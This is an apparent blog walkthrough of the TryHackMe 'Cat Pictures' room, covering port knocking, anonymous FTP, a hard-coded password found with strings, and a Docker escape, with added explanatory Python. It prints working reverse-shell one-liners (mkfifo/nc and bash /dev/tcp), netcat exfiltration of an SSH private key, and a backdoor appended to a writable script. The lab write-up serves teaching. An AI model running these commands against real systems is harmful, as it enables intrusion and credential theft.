hamzairshad02

TryHackMe: Cat Pictures - Walkthrough

Machine Link: Cat Pictures

I was just browsing through TryHackMe and this picture had me intrigued.


So I launched the machine and started off with the warmup (i.e. Nmap).

```
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -v -A 10.10.248.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-09 12:15 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating Ping Scan at 12:15
Scanning 10.10.248.4 [2 ports]
Completed Ping Scan at 12:15, 0.46s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:15
Completed Parallel DNS resolution of 1 host. at 12:15, 0.01s elapsed
Initiating Connect Scan at 12:15
Scanning 10.10.248.4 [1000 ports]
Discovered open port 22/tcp on 10.10.248.4
Discovered open port 8080/tcp on 10.10.248.4
Connect Scan Timing: About 31.35% done; ETC: 12:17 (0:01:08 remaining)
Increasing send delay for 10.10.248.4 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.248.4 from 5 to 10 due to max_successful_tryno increase to 6
Warning: 10.10.248.4 giving up on port because retransmission cap hit (6).
Completed Connect Scan at 12:16, 68.32s elapsed (1000 total ports)
Initiating Service scan at 12:16
Scanning 2 services on 10.10.248.4
Completed Service scan at 12:16, 10.91s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.248.4.
Initiating NSE at 12:16
Completed NSE at 12:17, 13.30s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 2.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.248.4
Host is up (0.42s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37436480d35a746281b7806b1a23d84a (RSA)
|   256 53c682efd27733efc13d9c1513540eb2 (ECDSA)
|_  256 ba97c323d4f2cc082ce12b3006189541 (ED25519)
163/tcp   filtered cmip-man
1236/tcp  filtered bvcontrol
1717/tcp  filtered fj-hdnet
2522/tcp  filtered windb
4550/tcp  filtered gds-adppiw-db
8080/tcp  open     http          Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Cat Pictures - Index page
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
49159/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.93 seconds
```

The scan shows SSH on port 22 and an Apache/PHP web server on port 8080, along with a few filtered ports, so let's look at the website on 8080.


I was expecting forums full of cattos but oh well. Let's look further into it.


The website gives a hint: "Knock knock! Magic Numbers: 1111, 2222, 3333, 4444". Those look like port numbers, so let's try port knocking.

Port knocking hides a service behind the firewall: the protected port stays filtered until a client connects, in a fixed order, to a predefined sequence of closed ports; a daemon on the server watches for that exact sequence and only then opens the protected port. I'm using a tool called knockd to hit the ports.
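To make the mechanism concrete, here is the server side of port knocking in miniature, as an added example that is not code from the room or from knockd itself: it tracks each source's progress through the 1111, 2222, 3333, 4444 sequence and only unlocks the protected port for a source that completes it in order. The timeout value and the sample traffic are assumptions constructed for the demo.

```python
KNOCK_SEQUENCE = (1111, 2222, 3333, 4444)  # from the site's hint; completing it unlocks port 21
SEQUENCE_TIMEOUT = 5.0                     # max seconds between knocks (assumed value)


class KnockDaemon:
    """Per-source progress through KNOCK_SEQUENCE, as a knockd-style daemon tracks it.

    Only a complete, in-order sequence within the timeout unlocks the port for
    that source; a wrong port resets progress, so a plain port scan that happens
    to touch 1111 does not stumble into the open state.
    """

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=SEQUENCE_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self.progress = {}   # src_ip -> (index of next expected knock, time of last knock)
        self.opened = set()  # sources for which the protected port has been unlocked

    def observe(self, src_ip, dst_port, now):
        """Feed one observed connection attempt; return True if src_ip is unlocked."""
        idx, last = self.progress.get(src_ip, (0, now))
        if idx > 0 and now - last > self.timeout:
            idx = 0  # too slow between knocks: start over
        if dst_port == self.sequence[idx]:
            idx += 1
        else:
            idx = 1 if dst_port == self.sequence[0] else 0  # reset, unless a fresh first knock
        if idx == len(self.sequence):
            self.opened.add(src_ip)  # real knockd would now add a firewall rule
            idx = 0
        self.progress[src_ip] = (idx, now)
        return src_ip in self.opened


# Constructed traffic: a correct knock from the attacking box, a scanner that hits
# a wrong port mid-sequence, and a knocker that pauses too long between knocks.
SAMPLE_EVENTS = [
    ("10.13.29.133", 1111, 0.0), ("10.13.29.133", 2222, 0.1),
    ("10.13.29.133", 3333, 0.2), ("10.13.29.133", 4444, 0.3),
    ("10.0.0.9", 1111, 1.0), ("10.0.0.9", 2222, 1.1), ("10.0.0.9", 9999, 1.2),
    ("10.0.0.9", 3333, 1.3), ("10.0.0.9", 4444, 1.4),
    ("10.0.0.7", 1111, 2.0), ("10.0.0.7", 2222, 2.5),
    ("10.0.0.7", 3333, 9.0), ("10.0.0.7", 4444, 9.1),
]


def replay(events=SAMPLE_EVENTS):
    """Replay (src_ip, dst_port, timestamp) events; return the set of unlocked sources."""
    daemon = KnockDaemon()
    for src, port, t in events:
        daemon.observe(src, port, t)
    return daemon.opened
```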

```
┌──(kali㉿kali)-[~]
└─$ knock 10.10.248.4 -v 1111 2222 3333 4444
hitting tcp 10.10.248.4:1111
hitting tcp 10.10.248.4:2222
hitting tcp 10.10.248.4:3333
hitting tcp 10.10.248.4:4444
```

After knocking on these ports, let's run the Nmap scan again: the FTP port (21) is now open.

```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.13.29.133
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
```

The Nmap scan even lists a note.txt file, reachable through the anonymous FTP login. After downloading it from the FTP server, it has the following content.

```
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is [password].
- catlover
```

The note tells us straight up to log in to port 4420 with the given password.

```
┌──(kali㉿kali)-[~]
└─$ nc 10.10.248.4 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
[password]
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr
ls home
catlover
ls home/catlover
runme
```

After logging in and looking around a bit, we find that the shell is quite limited. There is a home directory called catlover with a runme file inside.

```
./home/catlover/runme
THIS EXECUTABLE DOES NOT WORK UNDER THE INTERNAL SHELL, YOU NEED A REGULAR SHELL.
```

Running the file tells us it needs a regular shell, so let's try to get one.

```
ls usr/bin
mkfifo
touch
wget
```

Digging a little further, we see that the machine can run mkfifo, touch and wget. touch only creates files and wget can only fetch over ftp, http and https, so mkfifo is the one to use. Let's take the nc mkfifo reverse shell from revshells.com.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.13.29.133 9001 >/tmp/f
```

Start a netcat listener and get the reverse shell.

```
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.248.4] 56820
sh: 0: can't access tty; job control turned off
# ls
bin
etc
home
lib
lib64
opt
tmp
usr
```

With the new shell, let's pull the runme file back to our machine by running the following command on the target.

```
nc [YOUR MACHINE IP] 443 < home/catlover/runme
```

Then start a netcat listener on your machine to receive it (the listener has to be up before the command on the target connects to it).

```
nc -nlvp 443 > runme
```

Once the transfer finishes, Ctrl+C the listener and you'll see the runme file on your machine.

```
┌──(kali㉿kali)-[~]
└─$ chmod +x runme

┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Access Denied
```

Running it with the same old password gets us Access Denied, so the binary needs a closer look. Let's use strings for that.

```
┌──(kali㉿kali)-[~]
└─$ strings runme
/lib64/ld-linux-x86-64.so.2
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZNSaIcED1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZSt3cin
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
_ZNSt8ios_base4InitD1Ev
_ZNSolsEPFRSoS_E
__gxx_personality_v0
_ZNSaIcEC1Ev
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZNSt8ios_base4InitC1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
_ZSt4cout
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE
_Unwind_Resume
__stack_chk_fail
__cxa_atexit
memcmp
system
__cxa_finalize
__libc_start_main
libstdc++.so.6
libgcc_s.so.1
libc.so.6
GCC_3.0
CXXABI_1.3
GLIBCXX_3.4.21
GLIBCXX_3.4
GLIBC_2.4
GLIBC_2.2.5
u+UH
ATSH
[A\]
[]A\A]A^A_
[password]
Please enter yout password: 
Welcome, catlover! SSH key transfer queued! 
touch /tmp/gibmethesshkey
Access Denied
```

The strings output shows the hard-coded password sitting right next to the prompt and messages the binary prints (and a system() call to touch /tmp/gibmethesshkey), so let's try it out.
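To show why strings finds the password at all, here is an added example (not the room's code and not the real runme binary) that reimplements the printable-run scan strings performs and runs it over a constructed stand-in for runme's data section; the placeholder password and the credential-triage heuristic are assumptions of this example.

```python
import string

PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " \t")

def extract_strings(blob, min_len=4):
    """Every run of at least min_len printable ASCII bytes in blob.

    This is the core of what `strings` does: it never parses the ELF, it just scans
    for printable runs, which is why a password kept as a plain literal in .rodata
    turns up right next to the prompt text the program prints.
    """
    found, run = [], bytearray()
    for b in blob:
        if chr(b) in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:  # flush a run that reaches end of input
        found.append(run.decode("ascii"))
    return found

def credential_candidates(strs, marker="password"):
    """Triage heuristic: the immediate neighbours of any string mentioning a password.
    A memcmp()-style check usually keeps the secret literal beside its prompt."""
    out = []
    for i, s in enumerate(strs):
        if marker in s.lower():
            out.extend(strs[max(0, i - 1):i] + strs[i + 1:i + 2])
    return [s for s in out if marker not in s.lower()]

# Constructed stand-in for runme's .rodata: the password is a placeholder, the
# other literals are the ones the walkthrough's strings output shows.
FAKE_RODATA = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 8   # header-ish bytes, no run long enough
    + b"ATSH\x00"                           # instruction bytes that happen to be printable
    + b"CHANGEME-placeholder\x00"           # stand-in for the hard-coded password
    + b"Please enter yout password: \x00"
    + b"Welcome, catlover! SSH key transfer queued! \x00"
    + b"touch /tmp/gibmethesshkey\x00"
    + b"Access Denied\x00\x01\x02"
)

def analyse_sample():
    """Run both steps over the constructed blob: (all strings, credential candidates)."""
    strs = extract_strings(FAKE_RODATA)
    return strs, credential_candidates(strs)
```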

```
┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!
```

Running it successfully creates a file /tmp/gibmethesshkey in our tmp folder. That file is of no use to us locally, so let's try running runme on the target machine with the password.

```
# ./home/catlover/runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!
```

After doing it, we see that a new id_rsa file has been created.

```
# ls /home/catlover
id_rsa
runme
```

id_rsa is a private key used to authenticate over SSH. Our Nmap scan showed that SSH is open, so let's use it: pull the file from the server with the same netcat method and pass it to ssh.

Pull the id_rsa file by running the following command on the target.

```
nc [YOUR MACHINE IP] 443 < home/catlover/id_rsa
```

Then start a netcat listener on your machine to receive it (again, start it before running the command on the target).

```
nc -nlvp 443 > id_rsa
```

Once the transfer finishes, Ctrl+C the listener and you'll see the id_rsa file on your machine. Fix the permissions on it, since ssh refuses to use a private key that other users can read.

```
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
```

Time to SSH in.

```
┌──(kali㉿kali)-[~]
└─$ ssh catlover@10.10.248.4 -i id_rsa
The authenticity of host '10.10.248.4 (10.10.248.4)' can't be established.
ED25519 key fingerprint is SHA256:1eaD00/uot2wrnOhWADr5ZbjIDs9twYBymqkwtQKXk0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.248.4' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Sep  9 11:15:03 PDT 2023

  System load:  0.79               Users logged in:                0
  Usage of /:   37.2% of 19.56GB   IP address for eth0:            10.10.248.4
  Memory usage: 34%                IP address for br-98674f8f20f9: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    109

52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/#
```

Aaaaand we got the shell.

```
root@7546fa2336d6:/# ls root
flag.txt
root@7546fa2336d6:/# cat root/flag.txt
[Flag 1]
root@7546fa2336d6:/# whoami
root
```

As we can see, we are root and we have a flag, but is it the root flag itself? Nope. On submitting it, it is accepted as Flag 1 and not as the root flag.

That seems sus. Are we root inside a Docker container then? One way to find out: look for a .dockerenv file in the / directory.
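The .dockerenv check can be scripted together with a second indicator, the cgroup path of PID 1. This is an added example, not part of the original walkthrough, and the two fake root trees it inspects are constructed for the demo.

```python
import os
import tempfile

DOCKERENV = ".dockerenv"
CGROUP_FILE = "proc/1/cgroup"
CGROUP_MARKERS = ("docker", "containerd", "kubepods", "lxc")

def container_indicators(root="/"):
    """Return the container indicators found under root (a real system uses root="/").

    /.dockerenv is the quick check from the walkthrough; /proc/1/cgroup is a second
    opinion, since a container's PID 1 usually sits in a cgroup path naming the
    runtime. On cgroup v2 that path can be just "/", so an empty result is not
    proof of being on the host.
    """
    hits = []
    if os.path.exists(os.path.join(root, DOCKERENV)):
        hits.append(DOCKERENV)
    cgroup = os.path.join(root, CGROUP_FILE)
    if os.path.isfile(cgroup):
        with open(cgroup, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                path = line.rstrip("\n").split(":")[-1]  # hierarchy-id:controllers:path
                if any(marker in path for marker in CGROUP_MARKERS):
                    hits.append("cgroup:" + path)
                    break
    return hits

def demo():
    """Build two constructed fake roots, container-like and host-like, and check both."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        ctr = os.path.join(tmp, "container")
        os.makedirs(os.path.join(ctr, "proc", "1"))
        open(os.path.join(ctr, DOCKERENV), "w").close()
        with open(os.path.join(ctr, CGROUP_FILE), "w") as fh:
            fh.write("0::/docker/7546fa2336d6\n")  # constructed; id taken from the container hostname
        host = os.path.join(tmp, "host")
        os.makedirs(os.path.join(host, "proc", "1"))
        with open(os.path.join(host, CGROUP_FILE), "w") as fh:
            fh.write("0::/init.scope\n")  # constructed host-style cgroup v2 line
        results["container"] = container_indicators(ctr)
        results["host"] = container_indicators(host)
    return results
```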

```
root@7546fa2336d6:/# ls -al
total 108
drwxr-xr-x   1 root root 4096 Mar 25  2021 .
drwxr-xr-x   1 root root 4096 Mar 25  2021 ..
-rw-------   1 root root  588 Jun  4  2021 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25  2021 .dockerenv
```

Got 'em! Time to escape this container then. Searching inside it we find a /opt/clean/clean.sh file. This file is writable, so we'll append a reverse shell to it.

```
root@7546fa2336d6:/opt/clean# echo "bash -i >& /dev/tcp/10.13.29.133/443 0>&1" >> clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh
#!/bin/bash

rm -rf /tmp/*
bash -i >& /dev/tcp/10.13.29.133/443 0>&1
```

With the reverse shell added to the file, we make it executable and run it.

```
root@7546fa2336d6:/opt/clean# chmod +x clean.sh
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May  1  2021 .
drwxrwxr-x 1 root root 4096 Mar 25  2021 ..
-rwxr-xr-x 1 root root   69 Sep 10 10:38 clean.sh
root@7546fa2336d6:/opt/clean# ./clean.sh
```

Now back to our netcat listener, which catches the connection.

```
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.136.91] 54742
bash: cannot set terminal process group (2120): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# whoami
whoami
root
root@cat-pictures:~# hostname
hostname
cat-pictures
```

Now all we gotta do is see the flag and that’s the end of the road.

```
root@cat-pictures:~# ls
ls
firewall
root.txt
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:

[Root Flag]
```

Hope you like this walkthrough. Happy Hacking!!
